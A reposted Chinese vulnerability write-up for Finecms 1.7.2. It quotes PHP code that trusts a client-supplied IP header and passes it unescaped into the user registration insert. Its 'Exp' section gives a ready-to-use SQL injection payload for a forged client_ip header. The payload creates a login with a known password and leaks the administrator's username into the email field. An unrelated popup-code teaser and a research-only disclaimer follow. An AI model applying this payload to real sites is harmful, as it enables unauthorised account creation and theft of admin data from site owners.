漏洞文件:
Client.Class.php 29行处
public static function get_user_ip() { if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $onlineip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $onlineip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $onlineip = $_SERVER['REMOTE_ADDR']; } return $onlineip; } /* 显然可以伪造一个client_ip进行注入 */
RegsiterController.php 145行处
private function reg($data) { if (empty($data)) return false; $data['groupid'] = 1; $data['regdate'] = time(); $data['regip'] = client::get_user_ip();//使用了get_user_ip的方法,漏洞就此产生. $data['status'] = $this->memberconfig['status'] ? 0 : 1; $data['modelid'] = (!isset($data['modelid']) || empty($data['modelid'])) ? $this->memberconfig['modelid'] : $data['modelid']; if (!isset($this->membermodel[$data['modelid']])) $this->memberMsg('会员模型不存在,请联系管理员。'); if ($this->memberconfig['uc_use'] == 1) { if (uc_get_user($data['username'])) { $this->memberMsg('该用户无需注册,请直接登录激活!', url('member/login'), 1); } $uid = uc_user_register($data['username'], $data['password'], $data['email']); if ($uid memberMsg('用户名不合法'); } elseif($uid == -2) { $this->memberMsg('包含要允许注册的词语'); } elseif($uid == -3) { $this->memberMsg('用户名已经存在'); } elseif($uid == -4) { $this->memberMsg('Email 格式有误'); } elseif($uid == -5) { $this->memberMsg('Email 不允许注册'); } elseif($uid == -6) { $this->memberMsg('该 Email 已经被注册'); } else { $this->memberMsg('未定义'); } } else { $username = $data['username']; } } $data['password'] = md5($data['password']); $userid = $this->member->insert($data); return $userid; }
Exp:
提交用户注册的时候,伪造一个client_ip,内容如下:
sb','1','6'),('hell','1b192f49ddec03d0c7e777d3e578cebf',(select username from fn_user where userid=1),'1','11111','sbd','1','6')#
成功之后,登陆用户:hell,密码:sbdan. 邮箱处就有管理员的user了.
摘自:https://www.t00ls.net/viewthread.php?tid=21094
文章来源于lcx.cc:Finecms 1.7.2注射漏洞
600*500 不加修饰的弹出窗口 将下面这段代码插入你的页面中,在页面加载时就会自动弹出一个窗口,并打开Google搜索引擎,是不是很简单啊! 将代码放置在中间是为了兼容较低版本浏览器的需要,在低版本的浏览器中标签内的内容将被视作注视。 打开的页面使用绝对路…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论